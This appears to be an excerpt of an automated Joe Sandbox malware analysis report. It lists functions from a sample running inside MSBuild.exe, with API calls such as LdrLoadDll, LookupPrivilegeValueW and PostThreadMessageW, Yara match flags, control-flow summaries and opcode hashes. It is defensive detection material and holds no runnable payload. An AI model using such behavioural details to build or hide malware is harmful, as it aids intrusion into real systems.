                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                  • Opcode ID: 84c53ec83906b71b5e58988550a06a7a480e02a190e821a3f715f5ff67fb73a3
                                                                                                                                                                                                                                                                  • Instruction ID: 30c59dcd2a0e96f916278b1fcb5d43212a3aa7a5c6eb1ab072c721bd42bedba9
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 84c53ec83906b71b5e58988550a06a7a480e02a190e821a3f715f5ff67fb73a3
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9990022E21341002E180715C640860A001597D1206F95D455F0015558CC915996D5322
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 013C2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                  • Opcode ID: ad34ade39a7faf22734f22b684b16e08144353f7ffda30daf42369f0553d81e1
                                                                                                                                                                                                                                                                  • Instruction ID: e916f83b8384f438d51cd1db6a9d6870678d40f007d94342bc62394c01de4ae0
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ad34ade39a7faf22734f22b684b16e08144353f7ffda30daf42369f0553d81e1
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DB90023A20141413E111715C5504707001997D0245F95C452F0424558DD6569A56A222
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 013C2DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                  • Opcode ID: df95ca85f61c664893b0184cf48c2b87b78c8ddd3fe8227cd2a70c4582b651fc
                                                                                                                                                                                                                                                                  • Instruction ID: b1ef9486daff2dedef0595bc83dcf4db910c7a136b8bd14269f1fc0ec8940b9b
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: df95ca85f61c664893b0184cf48c2b87b78c8ddd3fe8227cd2a70c4582b651fc
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C090022A24245152A545B15C54045074016A7E0245795C052F1414950CC526A95AD722
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 013C2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                  • Opcode ID: 2efddc9a34c6824492028e229328a2ab4d0353deb5b0c2ebd260cd5f1bf37004
                                                                                                                                                                                                                                                                  • Instruction ID: 2459b99df45f40bcfb6ac5c0d004d7d15881d24d0989815a77f6c91656c10ac8
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2efddc9a34c6824492028e229328a2ab4d0353deb5b0c2ebd260cd5f1bf37004
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EC90023A20149802E110715C940474A001597D0305F59C451F4424658DC69599957222
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 013C2CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                  • Opcode ID: e2e187a52400684116c1cb7ec76601f65ad4ed5769ca245caf4f7d246d815c10
                                                                                                                                                                                                                                                                  • Instruction ID: f7372694048e174e57a04960104cd517d5f321ecdcf7a7367358d27b5facef12
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e2e187a52400684116c1cb7ec76601f65ad4ed5769ca245caf4f7d246d815c10
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1790023A20141402E100759C6408646001597E0305F55D051F5024555EC66599956232
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 013C2F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                  • Opcode ID: 2735e52a240253b26d464ba9f31dc6106b6dfa4e850b316e9fd59174ea05d1dd
                                                                                                                                                                                                                                                                  • Instruction ID: 590022201b7bfbdd3e14f22e31bf3dd767d0cc746ed720ccefb1e678143280df
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2735e52a240253b26d464ba9f31dc6106b6dfa4e850b316e9fd59174ea05d1dd
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E090026A34141442E100715C5414B060015D7E1305F55C055F1064554DC619DD566227
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 013C2FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                  • Opcode ID: e877a0dc84ada0e4e50cc679ddcb359272704415e989e55aafa2ec31612f9517
                                                                                                                                                                                                                                                                  • Instruction ID: e1b7459457a4dab14848b137931f5622fa1c409304c6f433dd1eef727995a53f
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e877a0dc84ada0e4e50cc679ddcb359272704415e989e55aafa2ec31612f9517
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BD90022A601410429140716C98449064015BBE1215755C161F0998550DC55999695766
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 013C2F90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                  • Opcode ID: 3943b97944316f167f9ef08aa48f02a8eda6e857c7b60e2b891e6bd9eb17f586
                                                                                                                                                                                                                                                                  • Instruction ID: 3d644a9a817170899693d9c959a2ade4ff7734ecbd91ad1ed1363488a828c2c7
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3943b97944316f167f9ef08aa48f02a8eda6e857c7b60e2b891e6bd9eb17f586
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F390023A20181402E100715C581470B001597D0306F55C051F1164555DC62599556672
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 013C2FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                  • Opcode ID: 0a65a3a05f717c6ab98120f2d9325d2d52e0269af8a4373888ce73a16b184cc8
                                                                                                                                                                                                                                                                  • Instruction ID: 29ef585945182bd30adfe7213877aa22bde88c0c3a7853ec14efaccc8869d3d0
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0a65a3a05f717c6ab98120f2d9325d2d52e0269af8a4373888ce73a16b184cc8
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6990022A211C1042E200756C5C14B07001597D0307F55C155F0154554CC91599655622
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 013C2EA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                  • Opcode ID: 163d8346bdd726062e0d267ed076678ff5ee79e730b5b665f9693f0136447332
                                                                                                                                                                                                                                                                  • Instruction ID: 79a9fd94ef0ee9594222770ae9d48050d2ee5571292e14a36ce729379b388e34
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 163d8346bdd726062e0d267ed076678ff5ee79e730b5b665f9693f0136447332
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5990027A20141402E140715C5404746001597D0305F55C051F5064554EC6599ED96766
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 013C2E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                  • Opcode ID: efc0aadbb80bde344c16389d26df5a8687ca4c9d1bd6bff885bd33d618b31e9d
                                                                                                                                                                                                                                                                  • Instruction ID: 39929d5ecaa58fdf7562ca0ab0d62a9e7a44a899ecf7e0030e6a890d7509a063
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: efc0aadbb80bde344c16389d26df5a8687ca4c9d1bd6bff885bd33d618b31e9d
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A590022A60141502E101715C5404616001A97D0245F95C062F1024555ECA259A96A232
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 00409AA0 Relevance: .1, Instructions: 92COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1872655625.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: a0a712f7dc38937f4870fd654377904c2279231d1bfc25cd8ff651c5ffef50f9
                                                                                                                                                                                                                                                                  • Instruction ID: aa195f0a0af1fd99cd61e52985a94cc4508177482d9610c79777d473fbad4be0
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a0a712f7dc38937f4870fd654377904c2279231d1bfc25cd8ff651c5ffef50f9
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D1213AB2D442095BCB21D664AD42BFF73BCAB54314F04007FE949A3182F638BF498BA5
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 0041A620 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 3 41a620-41a651 call 41af50 RtlAllocateHeap
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(&EA,?,00414C9F,00414C9F,?,00414526,?,?,?,?,?,00000000,00409CE3,?), ref: 0041A64D
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1872655625.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                                                                                                                                                  • String ID: &EA
                                                                                                                                                                                                                                                                  • API String ID: 1279760036-1330915590
                                                                                                                                                                                                                                                                  • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                                                                                                                                                                                  • Instruction ID: 51260f1f489a67c7b9949974b81657d9e18ee3442a924465d5a53260c52aa3af
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AFE012B1200208ABDB14EF99CC41EA777ACAF88664F118559BA1C5B242C630F9118AB4
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 00408308 Relevance: 1.6, APIs: 1, Instructions: 59threadwindowCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 201 408308-40835a call 41be60 call 41ca00 call 40ace0 call 414e40 210 40835c-40836e PostThreadMessageW 201->210 211 40838e-408392 201->211 212 408370-40838a call 40a470 210->212 213 40838d 210->213 212->213 213->211
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1872655625.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: MessagePostThread
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1836367815-0
                                                                                                                                                                                                                                                                  • Opcode ID: 05aedbb0cc032199d2a0ea7a4a23d7ff51e9baae67a803a0d7c9c071956d0953
                                                                                                                                                                                                                                                                  • Instruction ID: dfd14484f8756f1337037f49c5bb319c1a718d80b430de8d270801b6b51d3b7a
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 05aedbb0cc032199d2a0ea7a4a23d7ff51e9baae67a803a0d7c9c071956d0953
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6701B571A8032877E721AA959C43FEE772CAB40B54F05011AFF04BB1C1E6B9690546EA
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 00408310 Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 216 408310-40831f 217 408328-40835a call 41ca00 call 40ace0 call 414e40 216->217 218 408323 call 41be60 216->218 225 40835c-40836e PostThreadMessageW 217->225 226 40838e-408392 217->226 218->217 227 408370-40838a call 40a470 225->227 228 40838d 225->228 227->228 228->226
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1872655625.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: MessagePostThread
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1836367815-0
                                                                                                                                                                                                                                                                  • Opcode ID: 6a1d8254ae87124ce6e9e81f42b42a43aed4653e7aad9609636b46490c561421
                                                                                                                                                                                                                                                                  • Instruction ID: 918bfee87343fa17fe5f753d684441ffefb87cf5ca75bfa6275ae09e86d24780
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6a1d8254ae87124ce6e9e81f42b42a43aed4653e7aad9609636b46490c561421
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 99018471A8032C77E721A6959C43FFE776C6B40B94F05012AFF04BA1C1E6E8690546EA
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 0041A831 Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 250 41a831-41a83b 251 41a7e3-41a7f4 LookupPrivilegeValueW 250->251 252 41a83d-41a854 250->252 253 41a85a-41a867 252->253 254 41a855 call 41afc0 252->254 254->253
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1C2,0040F1C2,0000003C,00000000,?,00409D55), ref: 0041A7F0
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1872655625.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: LookupPrivilegeValue
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3899507212-0
                                                                                                                                                                                                                                                                  • Opcode ID: 045454d8f7207c05855c9fcb15a0470e96fcbfae148d082e36360352e0b7ab52
                                                                                                                                                                                                                                                                  • Instruction ID: 155c8905e5ffd90958d4be1338a29e5eea5cd0ed795ba59d65ac55005af22646
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 045454d8f7207c05855c9fcb15a0470e96fcbfae148d082e36360352e0b7ab52
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D4F027722010106FD710EF908C84CF6BB68EF80364B04868AF98C4B606C131D5068790
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 0040ACD5 Relevance: 1.5, APIs: 1, Instructions: 30libraryloaderCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 256 40acd5-40acd8 257 40ad24-40ad3e call 41d2f0 call 41b490 256->257 258 40acda-40acdc 256->258 264 40ad40-40ad54 LdrLoadDll 257->264 265 40ad57-40ad5a 257->265 258->257 264->265
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD52
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1872655625.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Load
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2234796835-0
                                                                                                                                                                                                                                                                  • Opcode ID: a415cac58d68dfaca2bfb8eab9fb54294f4affb5b9b63133db624c02dc9878b1
                                                                                                                                                                                                                                                                  • Instruction ID: ddf452be8d32bd8d5c02d74a71cd88acdd8eb8442453b4e5dfadc78ed76f39f2
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a415cac58d68dfaca2bfb8eab9fb54294f4affb5b9b63133db624c02dc9878b1
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CBE065B5E4010AABDB00DB94DC41FDDB3789B5430DF0086A9E918D7241E635DB558B91
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 0041A7B1 Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 269 41a7b1-41a7d9 270 41a7df-41a7f4 LookupPrivilegeValueW 269->270 271 41a7da call 41af50 269->271 271->270
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1C2,0040F1C2,0000003C,00000000,?,00409D55), ref: 0041A7F0
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1872655625.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: LookupPrivilegeValue
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3899507212-0
                                                                                                                                                                                                                                                                  • Opcode ID: 1a7bc5213b149611ed9bd7f88b9327f9a50013e07d492ba0556679f70e62490a
                                                                                                                                                                                                                                                                  • Instruction ID: 0a504d6448d3ba53e6a46163b4aa65dc5f8b14d93cca9d987dc30f78fe456e58
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1a7bc5213b149611ed9bd7f88b9327f9a50013e07d492ba0556679f70e62490a
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F1E022B01041646BDB10EB259D52EE73BE8EF81224F15899AFC8E67203C538E80687B4
                                                                                                                                                                                                                                                                  Uniqueness

